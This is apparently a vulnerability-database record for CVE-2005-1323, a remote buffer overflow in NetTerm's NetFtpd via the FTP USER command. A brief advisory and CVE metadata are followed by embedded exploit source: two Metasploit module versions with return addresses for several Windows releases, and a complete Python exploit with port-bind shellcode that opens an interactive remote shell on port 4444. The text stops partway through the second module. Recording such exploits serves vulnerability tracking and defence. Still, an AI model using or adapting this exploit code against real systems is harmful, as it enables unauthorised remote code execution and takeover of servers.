ID KLA10272Type kasperskyReporter Kaspersky LabModified 2020-05-22T00:00:00
Description
Detect date : 05/02/2005
Severity :Critical
Description :A buffer overflow was found in NetTerm. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a specially designed command.
Affected products :Intersoft Netterm
Solution :Update to latest version
Impacts :ACE
Related products :NetTerm
CVE-IDS :CVE-2005-1323 7.5Critical
{"id": "KLA10272", "bulletinFamily": "info", "title": "\r KLA10272ACE vulnerability in NetTerm ", "description": "### *Detect date*:\n05/02/2005\n\n### *Severity*:\nCritical\n\n### *Description*:\nA buffer overflow was found in NetTerm. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a specially designed command.\n\n### *Affected products*:\nIntersoft Netterm\n\n### *Solution*:\nUpdate to latest version\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[NetTerm](<https://threats.kaspersky.com/en/product/NetTerm/>)\n\n### *CVE-IDS*:\n[CVE-2005-1323](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1323>)7.5Critical", "published": "2005-05-02T00:00:00", "modified": "2020-05-22T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10272", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2005-1323"], "type": "kaspersky", "lastseen": "2020-09-02T11:56:07", "edition": 41, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-1323"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FTP/NETTERM_NETFTPD_USER"]}, {"type": "exploitdb", "idList": ["EDB-ID:16735", "EDB-ID:955"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83000"]}, {"type": "osvdb", "idList": ["OSVDB:15865"]}, {"type": "nessus", "idList": ["NETFTPD.NASL"]}], "modified": "2020-09-02T11:56:07", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2020-09-02T11:56:07", "rev": 2}, "vulnersScore": 6.4}, "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:34:54", "description": "Buffer overflow in NetFtpd for NetTerm 5.1.1 and earlier allows remote attackers to execute arbitrary code via a long USER command.", "edition": 3, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-1323", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1323"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:intersoft:netterm:4.2.2"], "id": "CVE-2005-1323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1323", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:intersoft:netterm:4.2.2:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:20:31", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "NetTerm NetFTPD USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1323"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83000", "href": "https://packetstormsecurity.com/files/83000/NetTerm-NetFTPD-USER-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Ftp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'NetTerm NetFTPD USER Buffer Overflow', \n'Description' => %q{ \nThis module exploits a vulnerability in the NetTerm NetFTPD \napplication. This package is part of the NetTerm package. \nThis module uses the USER command to trigger the overflow. \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-1323'], \n[ 'OSVDB', '15865'], \n[ 'URL', 'http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'], \n[ 'BID', '13396'], \n \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\\x0a\\x20\\x0d\", \n'StackAdjustment' => -3500, \n \n}, \n \n'Targets' => \n[ \n[ \n'NetTerm NetFTPD Universal', # Tested OK - hdm 11/24/2005 \n{ \n'Platform' => 'win', \n'Ret' => 0x0040df98, # netftpd.exe (multiple versions) \n}, \n], \n[ \n'Windows 2000 English', \n{ \n'Platform' => 'win', \n'Ret' => 0x75022ac4, # ws2help.dll \n}, \n], \n[ \n'Windows XP English SP0/SP1', \n{ \n'Platform' => 'win', \n'Ret' => 0x71aa32ad, # ws2help.dll \n}, \n], \n[ \n'Windows 2003 English', \n{ \n'Platform' => 'win', \n'Ret' => 0x7ffc0638, # peb magic :-) \n}, \n], \n[ \n'Windows NT 4.0 SP4/SP5/SP6', \n{ \n'Platform' => 'win', \n'Ret' => 0x77681799, # ws2help.dll \n}, \n], \n], \n'DisclosureDate' => 'Apr 26 2005', \n'DefaultTarget' => 0)) \nend \n \ndef check \nconnect \ndisconnect \nif (banner =~ /NetTerm FTP server/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nprint_status(\"Trying target #{target.name}...\") \n \n# U push ebp \n# S push ebx \n# E inc ebp \n# R push edx \n# \\x20\\xC0 and al, al \n \nbuf = rand_text_english(8192, payload_badchars) \nbuf[0, 1] = \"\\xc0\" \nbuf[1, payload.encoded.length] = payload.encoded \nbuf[1014, 4] = [ target.ret ].pack('V') \n \nsend_cmd( [\"USER #{buf}\"] ) \nsend_cmd( ['HELP'] ) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83000/netterm_netftpd_user.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:11", "bulletinFamily": "software", "cvelist": ["CVE-2005-1323"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in NetTerm NetFtpd. NetFtpd fails to handle overly long input to the USER command resulting in a buffer overflow. With a specially crafted request, a remote attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue. According to the vendor, NetFtpd has been removed from NetTerm.\n## Short Description\nA remote overflow exists in NetTerm NetFtpd. NetFtpd fails to handle overly long input to the USER command resulting in a buffer overflow. With a specially crafted request, a remote attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://netterm.com/html/netterm.html\n[Secunia Advisory ID:15140](https://secuniaresearch.flexerasoftware.com/advisories/15140/)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0573.html\nISS X-Force ID: 20285\nGeneric Exploit URL: http://metasploit.com/projects/Framework/modules/exploits/netterm_netftpd_user_overflow.pm\n[CVE-2005-1323](https://vulners.com/cve/CVE-2005-1323)\nBugtraq ID: 13396\n", "modified": "2005-04-26T08:06:16", "published": "2005-04-26T08:06:16", "href": "https://vulners.com/osvdb/OSVDB:15865", "id": "OSVDB:15865", "title": "NetTerm NetFtpd USER Command Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:16:00", "description": "NetFTPd 4.2.2 User Authentication Remote Buffer Overflow Exploit. CVE-2005-1323. Remote exploit for windows platform", "published": "2005-04-26T00:00:00", "type": "exploitdb", "title": "NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1323"], "modified": "2005-04-26T00:00:00", "id": "EDB-ID:955", "href": "https://www.exploit-db.com/exploits/955/", "sourceData": "#\r\n# Net-ftpd 4.2.2 user autentication b0f exploit (0day)\r\n# coded by Sergio 'shadown' Alvarez\r\n#\r\n\r\nimport struct\r\nimport socket\r\nimport sys\r\nimport time\r\n\r\nclass warftpd:\r\n\tdef __init__(self, host, port):\r\n\t\tself.host\t\t= host\r\n\t\tself.port\t\t= port\r\n\t\tself.bsize\t\t= 512\r\n\t\tself.ebpaddr\t= 0xcacacaca\r\n\t\tself.retaddr\t= 0xdeadbeef\r\n\t\tself.sctype\t\t= 'findskt'\r\n\t\tself.scport\t\t= None\r\n\r\n\tdef setebpaddr(self, addr):\r\n\t\tself.ebpaddr = addr\r\n\r\n\tdef setretaddr(self, addr):\r\n\t\tself.retaddr = addr\r\n\r\n\tdef setbsize(self, size):\r\n\t\tself.bsize = size\r\n\r\n\tdef setsctype(self, type):\r\n\t\tself.sctype = type\r\n\r\n\tdef setscport(self, port):\r\n\t\tself.scport = port\r\n\r\n\tdef genbuffer(self):\r\n\t\t## \r\n\t\t# Alpha port bind 4444, thanx metasploit\r\n\t\t## \r\n\t\tsc = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"\r\n\t\tsc += \"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x51\\x5a\\x6a\\x46\"\r\n\t\tsc += \"\\x58\\x30\\x41\\x31\\x50\\x42\\x41\\x6b\\x42\\x41\\x56\\x42\\x32\\x42\\x41\\x32\"\r\n\t\tsc += \"\\x41\\x41\\x30\\x41\\x41\\x58\\x50\\x38\\x42\\x42\\x75\\x69\\x79\\x6b\\x4c\\x70\"\r\n\t\tsc += \"\\x6a\\x78\\x6b\\x70\\x4f\\x6d\\x38\\x59\\x69\\x49\\x6f\\x69\\x6f\\x6b\\x4f\\x61\"\r\n\t\tsc += \"\\x70\\x4c\\x4b\\x70\\x6c\\x35\\x74\\x66\\x44\\x6c\\x4b\\x73\\x75\\x45\\x6c\\x4c\"\r\n\t\tsc += \"\\x4b\\x31\\x6c\\x55\\x55\\x62\\x58\\x54\\x41\\x38\\x6f\\x6e\\x6b\\x50\\x4f\\x57\"\r\n\t\tsc += \"\\x68\\x4c\\x4b\\x33\\x6f\\x65\\x70\\x56\\x61\\x38\\x6b\\x69\\x73\\x50\\x30\\x37\"\r\n\t\tsc += \"\\x39\\x6c\\x4b\\x50\\x34\\x4e\\x6b\\x77\\x71\\x58\\x6e\\x34\\x71\\x4b\\x70\\x4a\"\r\n\t\tsc += \"\\x39\\x6e\\x4c\\x6b\\x34\\x4f\\x30\\x64\\x34\\x35\\x57\\x6b\\x71\\x6b\\x7a\\x56\"\r\n\t\tsc += \"\\x6d\\x53\\x31\\x78\\x42\\x7a\\x4b\\x69\\x64\\x35\\x6b\\x32\\x74\\x61\\x34\\x76\"\r\n\t\tsc += \"\\x48\\x44\\x35\\x4d\\x33\\x4c\\x4b\\x63\\x6f\\x56\\x44\\x37\\x71\\x5a\\x4b\\x50\"\r\n\t\tsc += \"\\x66\\x6e\\x6b\\x66\\x6c\\x32\\x6b\\x4c\\x4b\\x31\\x4f\\x45\\x4c\\x75\\x51\\x38\"\r\n\t\tsc += \"\\x6b\\x34\\x43\\x76\\x4c\\x4c\\x4b\\x6b\\x39\\x72\\x4c\\x45\\x74\\x47\\x6c\\x63\"\r\n\t\tsc += \"\\x51\\x7a\\x63\\x45\\x61\\x4f\\x30\\x53\\x54\\x4e\\x6b\\x67\\x30\\x30\\x30\\x4c\"\r\n\t\tsc += \"\\x4b\\x63\\x70\\x34\\x4c\\x4e\\x6b\\x34\\x30\\x37\\x6c\\x4e\\x4d\\x4e\\x6b\\x71\"\r\n\t\tsc += \"\\x50\\x55\\x58\\x61\\x4e\\x73\\x58\\x6e\\x6e\\x70\\x4e\\x64\\x4e\\x68\\x6c\\x70\"\r\n\t\tsc += \"\\x50\\x4b\\x4f\\x6b\\x66\\x30\\x31\\x49\\x4b\\x50\\x66\\x52\\x73\\x53\\x56\\x30\"\r\n\t\tsc += \"\\x68\\x74\\x73\\x57\\x42\\x43\\x58\\x61\\x67\\x61\\x63\\x75\\x62\\x63\\x6f\\x36\"\r\n\t\tsc += \"\\x34\\x49\\x6f\\x58\\x50\\x45\\x38\\x4a\\x6b\\x4a\\x4d\\x39\\x6c\\x57\\x4b\\x56\"\r\n\t\tsc += \"\\x30\\x69\\x6f\\x5a\\x76\\x43\\x6f\\x4d\\x59\\x78\\x65\\x35\\x36\\x4c\\x41\\x48\"\r\n\t\tsc += \"\\x6d\\x66\\x68\\x37\\x72\\x71\\x45\\x62\\x4a\\x64\\x42\\x6b\\x4f\\x38\\x50\\x35\"\r\n\t\tsc += \"\\x38\\x6e\\x39\\x64\\x49\\x7a\\x55\\x4c\\x6d\\x31\\x47\\x79\\x6f\\x6e\\x36\\x56\"\r\n\t\tsc += \"\\x33\\x62\\x73\\x72\\x73\\x30\\x53\\x71\\x43\\x77\\x33\\x30\\x53\\x67\\x33\\x36\"\r\n\t\tsc += \"\\x33\\x59\\x6f\\x7a\\x70\\x30\\x66\\x70\\x68\\x76\\x71\\x73\\x6c\\x41\\x76\\x72\"\r\n\t\tsc += \"\\x73\\x6f\\x79\\x7a\\x41\\x4c\\x55\\x32\\x48\\x4c\\x64\\x44\\x5a\\x74\\x30\\x4a\"\r\n\t\tsc += \"\\x67\\x56\\x37\\x49\\x6f\\x4a\\x76\\x51\\x7a\\x44\\x50\\x42\\x71\\x53\\x65\\x6b\"\r\n\t\tsc += \"\\x4f\\x38\\x50\\x30\\x68\\x6f\\x54\\x4e\\x4d\\x44\\x6e\\x79\\x79\\x30\\x57\\x79\"\r\n\t\tsc += \"\\x6f\\x68\\x56\\x41\\x43\\x30\\x55\\x4b\\x4f\\x4a\\x70\\x52\\x48\\x4d\\x35\\x67\"\r\n\t\tsc += \"\\x39\\x6f\\x76\\x30\\x49\\x33\\x67\\x6b\\x4f\\x4a\\x76\\x72\\x70\\x63\\x64\\x61\"\r\n\t\tsc += \"\\x44\\x30\\x55\\x49\\x6f\\x38\\x50\\x4c\\x53\\x65\\x38\\x4b\\x57\\x72\\x59\\x6a\"\r\n\t\tsc += \"\\x66\\x63\\x49\\x72\\x77\\x69\\x6f\\x78\\x56\\x41\\x45\\x4b\\x4f\\x6a\\x70\\x70\"\r\n\t\tsc += \"\\x66\\x70\\x6a\\x63\\x54\\x61\\x76\\x30\\x68\\x43\\x53\\x72\\x4d\\x6c\\x49\\x68\"\r\n\t\tsc += \"\\x65\\x53\\x5a\\x70\\x50\\x53\\x69\\x76\\x49\\x6a\\x6c\\x6f\\x79\\x4d\\x37\\x61\"\r\n\t\tsc += \"\\x7a\\x67\\x34\\x4e\\x69\\x59\\x72\\x37\\x41\\x6b\\x70\\x6a\\x53\\x4c\\x6a\\x59\"\r\n\t\tsc += \"\\x6e\\x53\\x72\\x56\\x4d\\x59\\x6e\\x33\\x72\\x64\\x6c\\x6c\\x53\\x4e\\x6d\\x42\"\r\n\t\tsc += \"\\x5a\\x35\\x68\\x4c\\x6b\\x6e\\x4b\\x4e\\x4b\\x72\\x48\\x44\\x32\\x6b\\x4e\\x4d\"\r\n\t\tsc += \"\\x63\\x54\\x56\\x79\\x6f\\x43\\x45\\x32\\x64\\x6b\\x4f\\x6b\\x66\\x33\\x6b\\x53\"\r\n\t\tsc += \"\\x67\\x30\\x52\\x63\\x61\\x66\\x31\\x52\\x71\\x53\\x5a\\x74\\x41\\x56\\x31\\x32\"\r\n\t\tsc += \"\\x71\\x73\\x65\\x50\\x51\\x4b\\x4f\\x5a\\x70\\x32\\x48\\x6c\\x6d\\x4a\\x79\\x47\"\r\n\t\tsc += \"\\x75\\x48\\x4e\\x62\\x73\\x6b\\x4f\\x7a\\x76\\x61\\x7a\\x6b\\x4f\\x6b\\x4f\\x35\"\r\n\t\tsc += \"\\x67\\x6b\\x4f\\x68\\x50\\x6e\\x6b\\x31\\x47\\x4b\\x4c\\x6d\\x53\\x68\\x44\\x41\"\r\n\t\tsc += \"\\x74\\x4b\\x4f\\x4e\\x36\\x36\\x32\\x49\\x6f\\x68\\x50\\x75\\x38\\x6c\\x30\\x4f\"\r\n\t\tsc += \"\\x7a\\x56\\x64\\x31\\x4f\\x43\\x63\\x59\\x6f\\x4a\\x76\\x4b\\x4f\\x38\\x50\\x46\"\r\n\t\t\r\n\t\t# shellcode\r\n\t\t#sc\t\t=\t\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\xe0\\x66\"\r\n\t\t#sc\t\t+=\t\"\\x1c\\xc2\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x8e\\x4a\\xc2\\xe0\\x66\\x4f\\x97\\xb6\"\r\n\t\t#sc\t\t+=\t\"\\x31\\x97\\xae\\xc4\\x7e\\x97\\x87\\xdc\\xed\\x48\\xc7\\x98\\x67\\xf6\\x49\\xaa\"\r\n\t\t#sc\t\t+=\t\"\\x7e\\x97\\x98\\xc0\\x67\\xf7\\x21\\xd2\\x2f\\x97\\xf6\\x6b\\x67\\xf2\\xf3\\x1f\"\r\n\t\t#sc\t\t+=\t\"\\x9a\\x2d\\x02\\x4c\\x5e\\xfc\\xb6\\xe7\\xa7\\xd3\\xcf\\xe1\\xa1\\xf7\\x30\\xdb\"\r\n\t\t#sc\t\t+=\t\"\\x1a\\x38\\xd6\\x95\\x87\\x97\\x98\\xc4\\x67\\xf7\\xa4\\x6b\\x6a\\x57\\x49\\xba\"\r\n\t\t#sc\t\t+=\t\"\\x7a\\x1d\\x29\\x6b\\x62\\x97\\xc3\\x08\\x8d\\x1e\\xf3\\x20\\x39\\x42\\x9f\\xbb\"\r\n\t\t#sc\t\t+=\t\"\\xa4\\x14\\xc2\\xbe\\x0c\\x2c\\x9b\\x84\\xed\\x05\\x49\\xbb\\x6a\\x97\\x99\\xfc\"\r\n\t\t#sc\t\t+=\t\"\\xed\\x07\\x49\\xbb\\x6e\\x4f\\xaa\\x6e\\x28\\x12\\x2e\\x1f\\xb0\\x95\\x05\\x61\"\r\n\t\t#sc\t\t+=\t\"\\x8a\\x1c\\xc3\\xe0\\x66\\x4b\\x94\\xb3\\xef\\xf9\\x2a\\xc7\\x66\\x1c\\xc2\\x70\"\r\n\t\t#sc\t\t+=\t\"\\x67\\x1c\\xc2\\x56\\x7f\\x04\\x25\\x44\\x7f\\x6c\\x2b\\x05\\x2f\\x9a\\x8b\\x44\"\r\n\t\t#sc\t\t+=\t\"\\x7c\\x6c\\x05\\x44\\xcb\\x32\\x2b\\x39\\x6f\\xe9\\x6f\\x2b\\x8b\\xe0\\xf9\\xb7\"\r\n\t\t#sc\t\t+=\t\"\\x35\\x2e\\x9d\\xd3\\x54\\x1c\\x99\\x6d\\x2d\\x3c\\x93\\x1f\\xb1\\x95\\x1d\\x69\"\r\n\t\t#sc\t\t+=\t\"\\xa5\\x91\\xb7\\xf4\\x0c\\x1b\\x9b\\xb1\\x35\\xe3\\xf6\\x6f\\x99\\x49\\xc6\\xb9\"\r\n\t\t#sc\t\t+=\t\"\\xef\\x18\\x4c\\x02\\x94\\x37\\xe5\\xb4\\x99\\x2b\\x3d\\xb5\\x56\\x2d\\x02\\xb0\"\r\n\t\t#sc\t\t+=\t\"\\x36\\x4c\\x92\\xa0\\x36\\x5c\\x92\\x1f\\x33\\x30\\x4b\\x27\\x57\\xc7\\x91\\xb3\"\r\n\t\t#sc\t\t+=\t\"\\x0e\\x1e\\xc2\\xf1\\x3a\\x95\\x22\\x8a\\x76\\x4c\\x95\\x1f\\x33\\x38\\x91\\xb7\"\r\n\t\t#sc\t\t+=\t\"\\x99\\x49\\xea\\xb3\\x32\\x4b\\x3d\\xb5\\x46\\x95\\x05\\x88\\x25\\x51\\x86\\xe0\"\r\n\t\t#sc\t\t+=\t\"\\xef\\xff\\x45\\x1a\\x57\\xdc\\x4f\\x9c\\x42\\xb0\\xa8\\xf5\\x3f\\xef\\x69\\x67\"\r\n\t\t#sc\t\t+=\t\"\\x9c\\x9f\\x2e\\xb4\\xa0\\x58\\xe6\\xf0\\x22\\x7a\\x05\\xa4\\x42\\x20\\xc3\\xe1\"\r\n\t\t#sc\t\t+=\t\"\\xef\\x60\\xe6\\xa8\\xef\\x60\\xe6\\xac\\xef\\x60\\xe6\\xb0\\xeb\\x58\\xe6\\xf0\"\r\n\t\t#sc\t\t+=\t\"\\x32\\x4c\\x93\\xb1\\x37\\x5d\\x93\\xa9\\x37\\x4d\\x91\\xb1\\x99\\x69\\xc2\\x88\"\r\n\t\t#sc\t\t+=\t\"\\x14\\xe2\\x71\\xf6\\x99\\x49\\xc6\\x1f\\xb6\\x95\\x24\\x1f\\x13\\x1c\\xaa\\x4d\"\r\n\t\t#sc\t\t+=\t\"\\xbf\\x19\\x0c\\x1f\\x33\\x18\\x4b\\x23\\x0c\\xe3\\x3d\\xd6\\x99\\xcf\\x3d\\x95\"\r\n\t\t#sc\t\t+=\t\"\\x66\\x74\\x32\\x6a\\x62\\x43\\x3d\\xb5\\x62\\x2d\\x19\\xb3\\x99\\xcc\\xc2\"\r\n\t\t# other stuff\r\n\t\tnops\t=\t\"\\x41\"*(self.bsize-len(sc)-50)\r\n\t\tebp\t=\tstruct.pack('<L', self.ebpaddr)\r\n\t\t# check if the value is an integer, otherwise it should be a string\r\n\t\tif self.retaddr.__class__.__name__ == 'int':\r\n\t\t\tret\t=\tstruct.pack('<L', self.retaddr)\r\n\t\telse:\r\n\t\t\tret\t=\tself.retaddr\r\n\t\t# assemble buffer to send\r\n\t\tbuffer\t=\t\"USER \"\r\n\t\tbuffer\t+=\tnops\r\n\t\tbuffer\t+=\tsc\r\n\t\tbuffer\t+=\t'\\x42'*(50-4)\r\n\t\tbuffer\t+=\tebp\r\n\t\tbuffer\t+=\tret\r\n\t\treturn buffer\r\n\r\n\tdef exploit(self):\r\n\t\t# connect\r\n\t\tskt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\ttry:\r\n\t\t\tskt.connect((self.host, self.port))\r\n\t\texcept socket.error, err:\r\n\t\t\tprint \"[-] Error: %s\" % err[1]\r\n\t\t\treturn None\r\n\t\tprint \"[+] Connected to %s:%d\" % (self.host, self.port)\r\n\t\t# recv banner\r\n\t\tprint \"[+] Receiving Banner\"\r\n\t\tres = skt.recv(100)\r\n\t\tprint res\r\n\t\t# send payload\r\n\t\ttime.sleep(1)\r\n\t\tprint \"[+] Sending payload\"\r\n\t\tskt.send(self.genbuffer())\r\n\t\ttime.sleep(2) # test on mcafee anti-b0f\r\n\t\tskt.close()\r\n\t\t# if successfull connect to the shell\r\n\t\ttime.sleep(2)\r\n\t\tskt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\ttry:\r\n\t\t\tskt.connect((self.host, 4444))\r\n\t\texcept socket.error, err:\r\n\t\t\tprint \"[-] Error: %s\" % err[1]\r\n\t\t\tprint \"[-] Explotation failed\\n[-] Daemon should be dead...\"\r\n\t\t\treturn None\r\n\t\tprint \"[+] Connected to shell at %s on port %d\" % (self.host, 4444)\r\n\t\tres = skt.recv(1024)\r\n\t\tif res:\r\n\t\t\tif res.count('Microsoft Windows'):\r\n\t\t\t\tprint \"[+] Welcome my lord, i'm here to serve you ;) ...\\n\"\r\n\t\t\t\tfrom telnetlib import Telnet\r\n\t\t\t\ttelnet = Telnet()\r\n\t\t\t\ttelnet.sock = skt\r\n\t\t\t\ttry:\r\n\t\t\t\t\ttelnet.interact()\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\t\t\t\tskt.close()\r\n\t\t\t\tprint \"[-] Bye..bye I hope you've enjoyed your stay.. ;)\"\r\n\t\t\t\treturn None\r\n\t\tskt.close()\r\n\t\tprint '[-] Explotation failed\\nDaemon should be dead...'\r\n\r\nif __name__ == '__main__':\r\n\tif len(sys.argv) != 3:\r\n\t\tprint \"*************************************\"\r\n\t\tprint \"* Coded by Sergio 'shadown' Alvarez *\"\r\n\t\tprint \"* shadown@gmail.com *\"\r\n\t\tprint \"*************************************\"\r\n\t\tprint \"Usage: %s host port\" % sys.argv[0]\r\n\t\tsys.exit(1)\r\n\r\n\texp = warftpd(sys.argv[1], int(sys.argv[2]))\r\n\texp.setsctype('findskt')\r\n\texp.setscport(1234)\r\n\texp.setbsize(1014)\r\n\texp.setebpaddr(0xdeadbeef) # sometimes needed, just in case\r\n\texp.setretaddr('\\x4c\\xfa\\x12\\x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)\r\n\texp.exploit()\r\n\r\n# milw0rm.com [2005-04-26]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/955/"}, {"lastseen": "2016-02-02T06:24:07", "description": "NetTerm NetFTPD USER Buffer Overflow. CVE-2005-1323. Remote exploit for windows platform", "published": "2010-10-05T00:00:00", "type": "exploitdb", "title": "NetTerm NetFTPD - USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1323"], "modified": "2010-10-05T00:00:00", "id": "EDB-ID:16735", "href": "https://www.exploit-db.com/exploits/16735/", "sourceData": "##\r\n# $Id: netterm_netftpd_user.rb 10559 2010-10-05 23:41:17Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Ftp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'NetTerm NetFTPD USER Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the NetTerm NetFTPD\r\n\t\t\t\tapplication. This package is part of the NetTerm package.\r\n\t\t\t\tThis module uses the USER command to trigger the overflow.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10559 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-1323'],\r\n\t\t\t\t\t[ 'OSVDB', '15865'],\r\n\t\t\t\t\t[ 'URL', 'http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'],\r\n\t\t\t\t\t[ 'BID', '13396'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x20\\x0d\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => [ 'win' ],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'NetTerm NetFTPD Universal', # Tested OK - hdm 11/24/2005\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x0040df98, # netftpd.exe (multiple versions)\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows 2000 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x75022ac4, # ws2help.dll\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows XP English SP0/SP1',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x71aa32ad, # ws2help.dll\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows 2003 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x7ffc0638, # peb magic :-)\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows NT 4.0 SP4/SP5/SP6',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x77681799, # ws2help.dll\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 26 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tdisconnect\r\n\t\tif (banner =~ /NetTerm FTP server/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tprint_status(\"Trying target 